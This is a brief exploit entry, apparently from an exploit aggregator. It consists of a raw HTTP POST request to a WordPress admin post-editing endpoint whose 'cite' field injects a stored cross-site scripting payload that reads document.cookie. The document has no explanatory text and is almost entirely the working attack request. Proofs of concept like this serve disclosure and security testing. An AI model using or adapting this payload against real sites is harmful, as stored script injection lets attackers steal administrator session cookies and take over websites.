Share
## https://sploitus.com/exploit?id=WPEX-ID:10272
POST /wp-admin/post.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/post.php?post=136&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 1381
Origin: http://example.com
Cookies; [SNIPPED]
Connection: close

[SNIPPED]&cite=<a href="http://google.com">http://google.com</a><script>alert(document.cookie)</script>